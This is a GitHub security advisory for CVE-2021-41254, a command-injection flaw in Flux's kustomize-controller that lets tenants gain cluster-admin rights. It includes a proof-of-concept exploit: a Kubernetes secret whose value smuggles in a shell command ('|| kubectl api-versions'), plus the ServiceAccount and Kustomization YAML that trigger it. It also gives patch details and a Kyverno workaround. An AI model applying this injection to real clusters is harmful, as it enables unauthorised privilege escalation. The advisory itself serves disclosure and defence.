ghsa-35rf-v2jv-gfg7
Vulnerability from github
Published
2021-11-15 17:35
Modified
2021-11-12 18:57
Severity ?
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
Privilege escalation to cluster admin on multi-tenant environments
Details

Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run kubectl commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.

Impact

Multitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue.

Exploit

To exploit the command injection, first we create a secret with a shell command:

sh kubectl create secret generic exploit-token --from-literal=token=" || kubectl api-versions"

Then we create a Service Account that refers to the above Secret:

yaml apiVersion: v1 kind: ServiceAccount metadata: name: exploit namespace: default automountServiceAccountToken: false secrets: - name: exploit-token

And finally a Kustomization that runs under the above Service Account:

yaml apiVersion: kustomize.toolkit.fluxcd.io/v1beta1 kind: Kustomization metadata: name: exploit namespace: default spec: interval: 5m path: "./deploy/" sourceRef: kind: GitRepository name: app serviceAccountName: exploit

When kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret.

Patches

This vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the kubectl binary has been removed from the container image.

Workarounds

To prevent the creation of Kubernetes Service Accounts with secrets in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.

yaml apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: restrict-sa spec: validationFailureAction: enforce background: false rules: - name: validate-sa match: resources: kinds: - ServiceAccount namespaces: - tenant1 - tenant2 subjects: - kind: User name: some@tenant1.com - kind: User name: some@tenant2.com - kind: ServiceAccount name: kustomize-controller namespace: flux-system - kind: ServiceAccount name: helm-controller namespace: flux-system validate: message: "Invalid service account" pattern: X(secrets): "*?"

References

Disclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF.

For more information

If you have any questions or comments about this advisory: * Open an issue in kustomize-controller repository

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fluxcd/kustomize-controller"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.15.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-41254"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-11-12T18:57:27Z",
    "nvd_published_at": "2021-11-12T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run `kubectl` commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.\n\n### Impact\n\nMultitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue.\n\n### Exploit \n\nTo exploit the command injection, first we create a secret with a shell command:\n\n```sh\nkubectl create secret generic exploit-token --from-literal=token=\" || kubectl api-versions\"\n```\n\nThen we create a Service Account that refers to the above Secret:\n\n```yaml\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n  name: exploit\n  namespace: default\nautomountServiceAccountToken: false\nsecrets:\n- name: exploit-token\n```\n\nAnd finally a Kustomization that runs under the above Service Account:\n\n```yaml\napiVersion: kustomize.toolkit.fluxcd.io/v1beta1\nkind: Kustomization\nmetadata:\n  name: exploit\n  namespace: default\nspec:\n  interval: 5m\n  path: \"./deploy/\"\n  sourceRef:\n    kind: GitRepository\n    name: app\n  serviceAccountName: exploit\n```\n\nWhen kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret.\n\n### Patches\n\nThis vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the `kubectl` binary has been removed from the container image.\n\n### Workarounds\n\nTo prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.\n\n```yaml\napiVersion: kyverno.io/v1\nkind: ClusterPolicy\nmetadata:\n  name: restrict-sa\nspec:\n  validationFailureAction: enforce\n  background: false\n  rules:\n    - name: validate-sa\n      match:\n        resources:\n          kinds:\n            - ServiceAccount\n          namespaces:\n            - tenant1\n            - tenant2\n        subjects:\n          - kind: User\n            name: some@tenant1.com\n          - kind: User\n            name: some@tenant2.com\n          - kind: ServiceAccount\n            name: kustomize-controller\n            namespace: flux-system\n          - kind: ServiceAccount\n            name: helm-controller\n            namespace: flux-system\n      validate:\n        message: \"Invalid service account\"\n        pattern:\n          X(secrets): \"*?\"\n```\n\n### References\n\nDisclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [kustomize-controller repository](http://github.com/fluxcd/kustomize-controller)\n\n",
  "id": "GHSA-35rf-v2jv-gfg7",
  "modified": "2021-11-12T18:57:27Z",
  "published": "2021-11-15T17:35:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41254"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fluxcd/kustomize-controller"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Privilege escalation to cluster admin on multi-tenant environments"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.